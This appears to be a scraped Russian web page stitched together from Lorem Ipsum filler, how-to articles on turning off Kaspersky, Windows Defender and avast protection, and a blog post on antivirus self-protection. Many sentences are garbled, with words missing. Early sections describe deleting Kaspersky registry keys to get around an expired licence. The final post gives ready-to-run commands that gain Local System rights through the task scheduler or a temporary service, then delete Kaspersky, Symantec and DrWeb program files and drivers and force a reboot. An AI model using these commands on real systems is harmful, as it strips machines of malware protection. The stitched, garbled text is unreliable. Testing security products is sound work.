Kaspersky не отключается самозащита. Самозащита антивирусов или режем антивирус без ножа

Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry"s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five http://jquery2dotnet.com/ centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.

Если Вы читаете данную статью, то наверняка задаете себе вопрос на тему как отключить самозащиту Касперского, если у Вас закончился срок лицензии и пункт меню самозащиты не активный, т.е. в нем ничего нельзя изменить. Данная статья поможет Вам отключить самозащиту, чтобы сделать и получить новый ключ.

Как отключить самозащиту, если нет лицензии

Для начала стоит сказать что существует два способа это сделать, один способ с удалением антивируса Касперского, а второй с загрузкой Windows в безопасном режиме. По сути оба метода в итоге дадут один и тот же результат. Начну я рассказывать с более доступного для простых пользователей метода через удаление программы.

2. Запускаем данную программу и соглашаемся с лицензионным соглашением.

После удаления Касперского нажимаем ОК и перезагружаем компьютер.

В появившейся строке вводим команду regedit и нажимаем ОК.

Перед нами редактор реестра Windows. Теперь тут нужно удалить некоторые ключи (папки). Они находятся по адресу:

HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC

Т.е. пользоваться как проводником, а удалить нужно по указанным выше адресам "папки" KasperskyLab и SPC , для этого нужно будет кликнуть по ним правой кнопкой мыши и выбрать пункт "Удалить ".

4. После тот как Вы справились с удалением данных ключей, мы закрываем редактор реестра и теперь скачиваем нужный продукт Касперского с официального сайта Kaspersky Total Security или Kaspersky Internet Security , устанавливаем скачанный антивирус Касперского и запускаем его. После чего мы видим что программа просит ввести лицензионный ключ или получить пробную версию, при этом вкладка самозащита снова стала активной и ее можно выключать.

Второй способ отключения самозащиты, если нет лицензии

Он заключается в том, что нужно перезагрузить компьютер в безопасный режим уже в безопасном режиме проделать те же самые операции начиная с пункта 3 данной инструкции. Т.е. не нужно будет удалять Касперского перед тем как лезть в реестр. Т.е. запустились в безопасном режиме, удалили в реестре те же самые ключи и перезагрузились в обычном режиме, после чего получаем доступ к заблокированной самозащите.

В видео чуть ниже наглядно показан процесс отключения заблокированной самозащиты, и можно визуально оценить данные манипуляции, на самом деле все очень просто.

Как известно, самозащита Антивируса Касперского представляет собой компонент, выполняющий роль защиты самого антивируса от вредоносного программного обеспечения, пытающегося нанести вред работе антивирусной программы либо удалить его с компьютера. Отключить самозащиту довольно просто - из меню настроек. Однако, не всегда можно это сделать. В этой статье узнаем, что делать, если самозащита касперского не отключается и как это исправить.

Самозащита касперского

Как отключить самозащиту касперского

При нормальных условия Самозащита касперского отключается в меню Настройки → Дополнительно → Самозащита . Чтобы попасть в настройки необходимо в левом нижнем углу главного окна программы нажать на значок шестеренки.

Затем нажать Самозащита и снять флажок напротив надписи Включить самозащиту .

Касперский самозащита не активна

По истечении срока действия лицензии на использование касперского его работа приостанавливается, а большинство функций блокируются. В числе таких функций и Самозащита. Для восстановления работы компонентов защиты необходимо активировать Касперского по новой лицензии либо воспользоваться следующим вариантом решения проблемы.

1 Удалить Касперского с помощью утилиты удаления продуктов Лаборатории Касперского . Для этого запустите утилиту, согласитесь с условиями лицензии. В появившемся окне выберите версию Касперского, которую нужно удалить, введите код капчи в соответствующее поле и нажмите Удалить .

После удаления система предложит перезагрузить компьютер откажитесь от перезагрузки. Сделаем это позже.

2 Дальше... Открываем системный реестр и находим в нем папку KasperskyLab . Точный путь HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab. Удалите ее . Да, УДАЛИТЕ , правой кнопкой...

У многих пользователей возникает необходимость отключить антивирус Касперского на время. Поводов для реализации этой процедуры может быть великое множество: ложные срабатывания, установка пиратского ПО и игр, программные конфликты, запуск другой антивирусной программы и т.д.

Однако не все знают, как корректно отключить Касперского на время.

В этой статье мы подробно поговорим о возможных способах отключения данной антивирусной программы.

Временная деактивация

Чтобы временно отключить антивирус:

1. Наведите курсор на иконку Касперского в трее (правая часть панели задач).

2. Клацните правую кнопку мышки.

3. В контекстно меню клацните пункт «Приостановить защиту… ».

4. Выберите режим приостановки:

«… на указанное время» - отключить Касперского на заданный в ниспадающем списке период времени. Щёлкните в первом пункте надпись «1 минуту» и выберите необходимое значение (3 минуты, 5 минут …. 3 часа, 5 часов).

«… до перезапуска программы» - антивирус активируется только после перезапуска;

«приостановить» - деактивация на неопределённый период: Касперский будет отключен до тех пор, пока пользователь снова его не включит.

5. После выбора режима кликните кнопку «Приостановить защиту».

6. Подтвердите действие: в окне «Внимание!» клацните «Продолжить».

Примечание. В запросе подтверждения можно задать отключение повтора запроса в последующие 30 минут. Для этого нужно кликом мышки установить «птичку» в окошке надстройки.

7. После приостановки появится сообщение «Защита не работает». На иконке антивируса в трее отобразится символ «восклицательный знак» (предупреждение о том, что защитное ПО отключено).

Другие способы отключения

Можно использовать и другие варианты деактивации антивирусной программы Касперский.

Способ #1

1. Кликните по иконке программы в трее. В меню нажмите «Настройка».

2. На вкладке «Общие», в графе «Защита», кликом мышки измените положение ползунка на «Выкл.».

Внимание! Здесь же, на вкладке «Общие», можно отключить автоматический запуск антивируса при включении компьютера.

Способ #2

Ещё можно полностью выгрузить защитное ПО из памяти - закрыть программу.

1. Откройте меню в трее и выберите «Выход».

2. Подтвердите закрытие приложения: в панели запроса щёлкните «Продолжить».

После активации выхода иконка из трэя исчезнет. Чтобы запустить снова антивирус, нужно воспользоваться его директорией в меню «Пуск».

Отключение самозащиты

Если нужно отключить самозащиту Касперского - специальный программный механизм, предотвращающий модификации элементов антивируса, - выполните эту инструкцию:

1. Перейдите в настройки программы и кликните вкладку «Дополнительно».

2. В списке справа выберите «Самозащита».

3. Щелчком мыши уберите «галочку» в строке «Включить самозащиту».

4. Подтвердите запрос: нажмите «Продолжить».

Будьте внимательны, отключая антивирус Касперского! В период его деактивации ваш ПК не имеет защиты и может быть подвержен всевозможным вирусным атакам. После выполнения необходимых процедур обязательно снова активируйте защитное ПО. Если возникает постоянная необходимость отключать антивирус при запуске какого-либо определённого приложения или загрузке конкретного веб-сайта, целесообразней добавить их в исключения и не прибегать к временной деактивации.

Инструкция

Отключение антивируса Касперского на определенное время.
Подобное действие чаще всего становится актуальным в тот момент, когда пользователь желает в игру. Необходимость в приостановке работы антивируса обуславливается тем, что некоторые игры при включенном ПО начинают зависать, отчего невозможно насладиться процессом. Чтобы временно приостановить работу антивируса Касперского , необходимо выполнить следующие действия.

На панели задач наведите курсор на иконку антивирусного ПО и кликнете по ней правой кнопкой мышки. В открывшемся меню левой кнопкой мышки кликните по разделу «Приостановка защиты». Далее вам необходимо определить время, в течение которого будет находиться в неактивном состоянии. Как вы заметите, после установленного времени в окне не отобразится сохранения настроек – чтобы применить новые параметры, кликните левой кнопкой мышки по окну «Приостановить на указанное время». По истечению указанного вами времени будет запущена .

Если же вы желаете полностью антивирус Касперского , вам нужно поступить следующим образом. Так же как и в случае с временной приостановкой защиты, кликните по иконке антивируса правой кнопкой мышки и выберите пункт «Выйти». В таком случае работа антивирусной программы будет завершена до того момента, пока вы вновь не активируете ее. Минусом подобного способа является тот факт, что пользователи зачастую забывают включать антивирус, вследствие чего, заражается вредоносными программами.

Антивирус Касперского – одна из самых популярных программ для защиты компьютера от вирусов и различных атак. Он не только распознает вредоносные программы, но и лечит зараженные файлы.

Инструкция

Бывает, что пользователи устанавливают некачественные или нелицензионные программы на свой компьютер. Возможно, это облегчает многие пользовательские задачи и экономит , но доверие неизвестным разработчикам может негативно сказаться на работе и безопасности собственного компьютера. Об этом вовремя предупреждает антивирус Касперского. Как только вы начинаете скачивать вредоносную (по его мнению) программу, антивирус пытается заблокировать ваше действие. Если вы решили пренебречь предупреждением Касперского, нажмите кнопку «Пропустить» на окне предупреждения, которое мгновенно появляется при определении антивирусом вредоносной программы. Касперский разрешит /установить файл, но будет следить за его работой и регулярно предупреждать вас о возможной опасности.

Если вы хотите отключить работу антивируса Касперский надолго, выполните следующие команды. Нажмите правой кнопкой мыши на иконку Касперского, которая находится в правой нижней части экрана рядом с часами. В открывшемся контекстом меню кликните опцию «Настройка».

Перед вами настройка общих параметров защиты Касперского. Слева – список опций, которые вы можете настроить в данный момент. Выбирайте пункт «Параметры».

По умолчанию антивирус Касперского использует самозащиту , то есть система постоянно проверяет свою работу и потенциальные угрозы. Уберите галочку, стоящую в окошке «Включить самозащиту». Подтвердите свои действия, нажав кнопки «Применить», а затем – «ОК». Защита антивируса отключена. Будьте предельно внимательны при работе в интернете или с незнакомыми носителями информации: ваш компьютер сейчас уязвим.

Если вы хотите на время отключить антивирус Касперского, кликните правой кнопкой мыши на иконку антивируса, находящуюся на нижней панели вашего монитора. В открывшемся меню выберите «Выход». Подтвердите свое решение, нажав «ОК».

Выход версии Windows Vista породил целую волну обсуждений нововведений, сделанных компанией Майкрософт в своей операционной системе, их значимости и полезности. Одним из таких нововведений стал встроенный антивирус Windows Defender (Защитник Windows), призванный, вероятно, «убить» рынок антивирусов сторонних разработчиков.

Однако как и в случае с брандмауэром, интернет-браузером и прочими компонентами Windows, этот продукт оказался недостаточно эффективен для того чтобы составить серьезную конкуренцию антивирусам от крупнейших мировых производителей, включая и российских гигантов Лаборатории Касперского и DrWeb. Столь важный вопрос, как защита от вредоносного программного обеспечения, пользователь по прежнему чаще доверяет профессионалам. А так как два на одном плохо уживаются, у пользователя возникает необходимость отключить от Майкрософт.

Для отключения защитника Windows воспользуйтесь следующей последовательностью шагов:

1. Откройте Панель управления (Пуск - Панель управления).


2. Щелкните элемент «Защитник Windows». Откроется окно программы Защитник Windows. В случае, если Защитника, содержащие определения вирусов, не являются актуальными, до выполнения каких-либо действий может потребоваться обновить антивирусные базы данных. После завершения обновления будет доступно меню программы.


3. В верхней части окна нажмите «Программы».


4. В открывшемся экране настроек нажмите ссылку «Параметры» в верхней части окна.


5. Возможности настройки позволяют отключить отдельные программы, такие как защита в реальном времени или автоматическая (соответствующие пункты в списке слева), или же полностью отказаться от Защитника, открыв пункт Администратор и сняв флажок «Использовать эту ».

Подключение компьютерной системы к Интернет потенциально опасно атакой вредоносных программ различного типа, поэтому прежде, чем отключить антивирус, необходимо разорвать интернет-соединение, а перед повторным соединением вновь включить встроенный антивирус Windows, или продукт одного из авторитетных производителей антивирусного программного обеспечения, позволяющий обеспечить надежную защиту программ и данных пользователя компьютера.

Видео по теме

Антивирусная программа автоматически защищает персональный компьютер от попадания и заражения его вирусами и вредоносными программами, а также от атак хакерами с помощью так называемых "экранов" (специальных модулей). Но не редко такая защита может привести к нарушению нормального функционирования различных программ. Поэтому может возникнуть необходимость ненадолго отключить ную автоматическую защиту вашего ПК.

Вам понадобится

• Компьютер, антивирус avast, брандмауэр Windows

Инструкция

Существует два вида защиты. Первая - это защита, встроенная в операционную , которая защищает от хакерских и вирусных атак из глобальной сети . А вторая - это установленная пользователем антивирусная , которая борется с вирусами, уже проникшими в ваш персональный .

Первый вид защиты. Откройте курсором "Центр обеспечения безопасности" путем нажатия кнопки "Пуск" и выберите последовательно пункты "Панель управления" - "Безопасность" - "Центр обеспечения безопасности". В открывшемся окне найдите ссылку "Брандмауэр Windows" и нажмите на нее левой кнопкой мыши. Далее в появившемся окне найдите вкладку "Общие", в этой вкладке вы увидите изображение красного щита с белым крестиком, где рядом будет надпись "Выключить"(не рекомендуется). Нажмите на нее. После чего в самом низу окна нажмите "OK" и закройте окно "Центр обеспечения безопасности".

Второй вариант отключения на примере "avast". Нажмите правую клавишу мыши на значке работающей программы "avast" в нижнем правом углу экрана (около часов). Затем в появившемся контекстном меню сначала кликните по названию "Управление «avast», а далее из списка выберите время, в течение которого защита ПК будет отключена: десять минут, один час, или до перезагрузки ПК. Далее в появившемся окне "Отключение компонента" подтвердите свой выбор , нажав кнопку "Да".

Когда программа отключится, значок антивируса в нижнем правом углу экрана (рядом с часами) поменяет свое изображение, и при наведении на него указателя мыши появится сообщение, предупреждающее о том, что "Осторожно ваша система не защищена". В итоге выполненных действий вы временно отключите автоматическую антивирусную защиту ПК с помощью программы «avast».

Видео по теме

Во время работы в сети интернет компьютер уязвим. Вирусы, вредоносные программы и прочие угрозы безопасности могут серьезно осложнить жизнь пользователя. Для защиты системы от рисков, связанных с выходом интернет, существует ное ПО. Но иногда возникают ситуации, когда защиту от вирусов необходимо отключить.

Инструкция

Антивирусные программы время от времени определяют как вредоносное программное обеспечение вполне невинные и нужные пользователю файлы. Особенно часто это происходит при установке новых приложений, также опасными могут быть признаны некоторые файлы запуска игр. Если вы уверены, что устанавливаемые или запускаемые вами файлы не содержат угрозы, отключите на время антивирус на своем компьютере .

Значок активной антивирусной программы обычно отражается в области уведомлений на «Панели задач» (в правой нижней части экрана, там, где расположены часы). Если вы не видите значка своего антивируса, разверните область уведомлений, нажав на кнопку в виде стрелки, указывающей вправо, на «Панели задач». Если «Панель задач» скрыта, нажмите клавишу Windows на клавиатуре.

Кликните по значку своей антивирусной программы правой кнопкой мыши и прочтите пункты выпадающего меню. Когда антивирус включен, в меню стоит маркер напротив соответствующего пункта («Включен», «Активирован», Enabled, Active, On и так далее). Уберите маркер с этого пункта, кликнув по нему левой кнопкой мыши.

В редких случаях в выпадающем меню не содержится команды для деактивации антивируса. Тогда вам доступны два варианта: либо отключите средства, отвечающие за блокировку опасных программ и вирусов, либо закройте приложение антивируса. В первом случае войдите в настройки антивирусной программы и переведите нужный компонент в состояние Disabled (например, для антивируса AVG это - компонент Resident Shield).

Во втором случае кликните по значку антивируса правой кнопкой мыши и выберите в выпадающем меню команду «Выход» (Exit). Если таковой нет, закройте приложение через «Диспетчер задач». Введите на клавиатуре сочетание клавиш Ctrl, Alt и Del, в открывшемся окне «Диспетчера» перейдите на вкладку «Процессы», найдите в списке процесс антивируса, выделите его левой кнопкой мыши и нажмите на кнопку «Завершить процесс».

Полезный совет

Не забудьте активировать антивирус при следующем входе в сеть интернет.

Антивирус Касперского - это одна из самых надежных и популярных программ своего рода. Как и любой другой антивирус, Касперский обладает опцией самозащиты, то есть не позволяет другим программам или пользователям изменять или уничтожать свои файлы. Но иногда режим самозащиты требуется отключить.

Инструкция

Существует ряд случаев, в которых вам необходимо самозащиту Касперского. К примеру, если вы хотите освободить немного места на жестком , удалив его трассировки. В действительности это очень просто, и весь процесс не займет у вас более двух минут.

Правой кнопкой мыши нажмите на иконку антивируса в левом углу. В появившемся меню выберите пункт «Настройка». Вам откроется окно общих параметров защиты, которое состоит из таких вкладок, как «Защита», «Проверка», «Обновление» и «Параметры». Выбираете последнюю.

В окне «Параметры» вы увидите опцию «Включить самозащиту». Напротив нее поставлен флажок. Это , что самозащита антивируса включена и охраняет файлы от изменения. Снимите флажок и нажмите на кнопку «ОК» или «Применить». После этого окно программы можно закрыть. В окно настроек вы также можете из основного окна антивируса. Соответствующая кнопка располагается в левом верхнем углу.

Антивирусы уже давно плотно укрепились на персональных компьютерах большинства пользователей. Наиболее распространенным из них стал Касперский. Запустить его не так уж и сложно. А как его отключить?

Инструкция

У пользователей, у которых компьютеры имеют доступ в сеть интернет, установлены антивирусы в 99% случаях. Но как бы хороши не были антивирусы, иногда все-таки возникают ситуации, когда пользователь не нуждается в их защите. Например, вы абсолютно точно уверены, что в принятой вами программе вирусов нет, но упрямый "Касперский" твердит и твердит: «ВИРУС». Что же в этой ситуации? Стоит ли деинсталлировать антивирус ради одной единственной программки? Бывает и так, что пользователь кодирует . Ему нужна полная . Ее также требует все тот же самый "Касперский". В этих, а так же многих других ситуациях, помочь сможет временное отключение антивируса "Касперский".

Для этого в первую очередь откройте главное окно антивируса "Касперский". Чтобы это сделать, щелкните в трее левой клавишей мыши по пиктограмме, символизирующей антивирус. В выпадающем меню выберите пункт «Открыть».

Подсказка: это окно можно открыть и другим способом, выполнив двойной щелчок левой клавишей мыши по той же самой иконке в трее.

Теперь откройте настройки антивируса "Касперский". Для этого кликните левой клавишей мыши по надписи «Настройки», которая расположена в верхнем правом углу рядом с пиктограммой шестеренок.

Перейдите на вкладку «Защита». Для этого достаточно выполнить одинарный щелчок по надписи «Защита» в левой части окна настроек.

Снимите галочку с надписи «Включить защиту».

Поочередно нажмите кнопки «Применить» и «Ок». Таким образом, вы сами отключили защиту. Когда вы выполните все действия, которым мешал антивирус "Касперский", снова повторите все вышеописанные действия. Но пятым шагом установите галочку обратно.

Видео по теме

Полезный совет

Для уверенности в том, что антивирус теперь не мешает работе, и еще большего освобождения системных ресурсов, попробуйте снять галочку рядом с надписью «Включить самозащиту». Эта надпись находится во вкладке «Параметры» окна настроек антивируса. Но как только вам понадобится рабочий антивирус, обязательно поставьте ее снова.

Антивирус Касперского является одним из самых известных и распространенных антивирусных приложений. Тем не менее, далеко не всем пользователям он нравится. Установив и испытав пробную версию , пользователь может захотеть ее удалить.

Инструкция

Программа от лаборатории Касперского достаточно хорошо справляется со своими обязанностями. Несмотря на это, многие пользователи, попробовав бесплатную тестовую версию , стараются поскорее от нее избавиться – уж очень навязчиво порой ведет себя этот антивирус, постоянно напоминая о себе.

Для того чтобы удалить антивирусную программу, ее сначала надо отключить. Делается это очень просто – найдите в трее значок антивируса Касперского , кликните его мышкой и выберите опцию «Выход». Работа программы будет остановлена, теперь вы можете легко удалить ее с компьютера.

Как удалить антивирус Касперского ? Это можно сделать тремя основными способами: во-первых, через строчку деинсталляции в меню Касперского в списке программ – «Пуск» - «Все программы» - «Антивирус Касперского » - «Удалить антивирус Касперского ». Во-вторых, через стандартный для Windows сервис установки и удаления программ: «Пуск» - «Панель управления» - «Установка и удаление программ». Наконец, его можно удалить с помощью сторонних утилит.

Именно использование сторонних утилит является самым надежным способом удаления. Воспользуйтесь для удаления антивируса Касперского с вашего компьютера программой Uninstall Tool. Ее главная особенность в том, что она способна не только удалить саму программу, но и очистить ваш компьютер от всех следов ее пребывания. Это очень полезная возможность, так как лишние записи в реестре замедляют загрузку компьютера и могут привести к сбоям.

Привет всем!

Недавно мы уже обсудили могущество эвристических технологий современных антивирусов и пришли к мнению, что верить никому нельзя. Даже иногда себе:)

Сегодня мы поговорим о другом спорном моменте антивирусов - самозащите. Некоторые вендоры очень серьёзно относятся к этому моменту, и их продукты выстаивают даже в сложных комплексных случаях активного заражения, эффективно снимая вирусные перехваты, устанавливаясь в систему и даже в последующем удаляя уже изрядно прописавшихся зловредов. Другие считают, что активное заражение - это битва с ветряными мельницами, не приводящая ни к чему путному, а потому - LiveCD, а в ряде случаев и format c:

Отдадим должное обоим оппонентам: безусловно, если есть возможность победить вирусное противостояние - это хорошо. Если только это не приводит к бсодам и загрузке системы на пару-тройку дней. И абсолютно очевидно, что при серьёзном и комплексном заражении зачастую невозможно пробиться через активную массу перехватов, вредоносных процессов на уровне ядра и прочего - а потому часто действительно разумнее провести лечение неактивной системы (с LiveCD или сканируя винчестер на незаражённой машине), ну а в случае разношёрстной файловой инфекции - и задуматься о полной переустановке ОС.

Но не будем предаваться спорам - оставим это для следующей статьи:) Поговорим о простом: о самозащите системы даже на заведомо незаражённой системе. И примем априори:

1) имеется комплексный продукт антивирус+хипс+файервол;
2) система была незаражена, но каким-то образом проник вредоносный код;
3) вредоносный код имеет своим намерением удалить антивирус или повредить его настолько, чтобы обеспечить полную неработоспособность.

Вариант действий будет самым простым - попытка удаления жизненно важных файлов антивируса с правами Local System. Идея такого подхода принадлежит моему хорошему другу Алексею Баранову, который сообщил о ней в закрытых кругах некоторое время назад. Время прошло, будем считать, что вендоры подтянулись - проверим это.

На Windows-системах, работая под администратором (а это, наверное, 80% всех систем) получить права Local System достаточно просто. В голову сразу приходит два способа, хорошо описанные в сети.

Способ 1. Использование планировщика.
По умолчанию, на всех Windows-системах работает служба планировщика задач. Эта служба запускает задачи с искомыми правами Local System. Тогда очень просто добавить задание как-то:
at 11:05 c:\killer.bat
и kill.bat запустится с правами Local System.

Преимущества очевидны: всё просто и ясно. Недостаток: пользователь может заметить странную новую задачу в планировщике, да и просто в целях безопасности отключить эту службу.

Способ 1. Создание службы.
Суть метода заключается в создании службы, её запуске и удалении. При этом всё реализуется в три строчки:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem

При этом мало того, что killer.bat запустится с приоритетом IDLE, он ещё и будет запущен от имени Local System.
Метод незаметен, никак не проявляет себя.

На момент публикования статьи KIS 2010 оба метода пропускал на уровне хипса, даже не запрашивая никаких разрешений.

Ну а теперь перейдём к самому killer.bat (в нашем случае он расположен в корне на диске С, но понятно, что закинуть его можно куда угодно).

Суть этого файла проста: удаляем всё, что принадлежит антивирусу. Так, для Касперского 2010 это будет:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"

Для Symantec что-то типа (кто знает точнее - поправьте, сам-то я на Касперском):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"
shutdown -r -f -c "Bye-Bye!!!"

Для Доктора Веба:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"

Понятно, что аналогичный скрипт можно прописать для всех антивирусов - суть изменять пути к жизненно важным файлам.

Итого - что же мы имеем?

1. KIS 2010 получил такой урон, что был убит, и система осталась без защиты. KIS 2011 лишён этой половой слабости - но он же всё ещё бета…
2. NIS потерял несколько файлов, но работоспособность не нарушилась, файлы впоследствии были скачаны и восстановлены при обновлении из Интернет.
3. DrWeb вообще не пострадал, что и ожидалось, принимая во внимание особый упор разработчика на противостояние инфекции. Но не забываем, что для Веба есть SpiDie …

При этом хипсы указанных продуктов спокойно пропустили оба варианта манипуляций (КИС проверил лично).

ВЫВОДЫ
К сожалению, приходится констатировать факт, что некоторые из существующих антивирусных решений имеют ряд уязвимостей, которые могут быть использованы для повреждения защиты и фактически удалению антивируса с компьютера.

Предлагается в комментариях дополнить наблюдения и исследования по другим антивирусным продуктам (желательно с хипс, чтобы оценить и уровень блокировки действий по получению прав Local System). Думаю, что описанные манипуляции понятны и могут быть легко воспроизведены на виртуальных машинах энтузиастов.

Cheers!

Теги: Добавить метки